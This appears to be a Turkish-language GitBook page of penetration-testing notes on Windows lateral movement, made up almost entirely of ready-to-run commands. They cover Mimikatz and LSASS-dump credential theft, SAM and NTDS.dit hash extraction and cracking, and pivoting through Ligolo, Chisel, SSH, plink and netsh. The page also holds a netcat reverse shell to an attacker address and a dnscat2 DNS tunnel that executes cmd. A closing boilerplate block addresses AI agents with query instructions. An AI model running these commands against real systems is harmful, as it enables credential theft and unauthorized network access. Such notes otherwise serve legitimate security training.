> For the complete documentation index, see [llms.txt](https://yigitsengezer.gitbook.io/siber-guvenlik-notlari/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://yigitsengezer.gitbook.io/siber-guvenlik-notlari/windows-pentesting/windows-lateral-movement.md). # Windows Lateral Movement ### Mimikatz Link: ```bash # Local User Hashlerini verir ./mimikatz.exe "token::elevate" "lsadump::sam" "exit" # LSA hashlerini verir ./mimikatz.exe "token::elevate" "lsadump::lsa /patch" "exit" # Cachelenmiş credentiallar ./mimikatz.exe "token::elevate" "lsadump::secrets" "exit" # Oturum açan kullanıcıların hashlerini verir ./mimikatz.exe "token::elevate" "sekurlsa::logonpasswords" "exit" ./mimikatz.exe "token::elevate" "sekurlsa::tickets" "exit" privilege::debug # Yetki kontrolü token::elevate # Yetki yükseltme hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force ``` ### LSADump `Open Task Manager` > `Select the Processes tab` > `Find & right click the Local Security Authority Process` > `Select Create dump file` ```bash # Lsaas process id buluyoruz tasklist /svc Get-Process lsass # Minidump lsa alıyoruz rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full # Kali üzerinde okuyoruz pypykatz lsa minidump lsass.dmp ``` ### Hash Dumping ```bash reg save hklm\system system reg save hklm\sam sam reg save hklm\security security impacket-secretsdump -sam sam -system system local john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt hashcat -a3 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt keepass2john Database.kdbx > hash.txt hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force ``` ### NTDS.Dit Dump (Domain Controller) ```bash vssadmin CREATE SHADOW /For=C: cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit impacket-secretsdump -ntds NTDS.dit LOCAL # Remote impacket-secretsdump administrator:'password123'@192.168.1.1 -just-dc ``` ### Ligolo ```bash ./proxy -selfcert -laddr 0.0.0.0:443 ./agent.exe -ignore-cert -connect 192.168.1.2:443 interface_create --name ligolo route_add --name ligolo --route 240.0.0.1/32 # Localhost route_add --name ligolo --route 10.0.0.1/24 # Subnet tunnel_start # Tünellemeyi başlatır # Hedefte 1234 portunu açar ve dinler istekleri bizdeki 4321'e yönlendirir. listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp ``` ### Chisel ```bash ./chisel server --port 8081 --reverse # Kali ./chisel client 192.168.1.2:8081 R:socks &> /tmp/output # Target mousepad /etc/proxychains4.conf socks5 127.0.0.1 1080 ./chisel client 192.168.1.2:8081 R:3307:127.0.0.1:3306 # Hedef:3306 > Kali:3307 # Hedefte Shell için Port Açma ./chisel server --port 8081 --reverse # Hedef ./chisel client 192.168.1.3:8081 R:8080:0.0.0.0:80 # Kali:8080 > Hedef:80 ``` ### Port Forwarding ```bash # Local systemctl start ssh mousepad /etc/proxychains4.conf #socks5 127.0.0.1 9999 # SSH Tunneling ssh -N -R 9999 root@192.168.1.2 proxychains nmap -v -sT -Pn -n 172.168.1.3 # Plink Tunnel C:\Windows\Temp\nc.exe -e cmd.exe 192.168.1.2 1234 C:\Windows\Temp\plink.exe -ssh -l root -pw root -R 127.0.0.1:3390:127.0.0.1:3389 192.168.1.3 nmap -sT -p 3390 127.0.0.1 # Netsh Tunnel (Local Admin Gerekir) netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.1.3 connectport=22 connectaddress=10.0.0.4 netsh interface portproxy show all netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.1.3 localport=2222 action=allow ssh database_admin@192.168.1.3 -p 2222 netsh advfirewall firewall delete rule name="port_forward_ssh_2222" netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64 # Meterpreter portfwd add -l 1234 -p 80 -r 10.0.0.1/24 ``` ### DNS Tunneling ```bash ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache Import-Module .\dnscat2.ps1 Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd dnscat2> window -i 1 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yigitsengezer.gitbook.io/siber-guvenlik-notlari/windows-pentesting/windows-lateral-movement.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.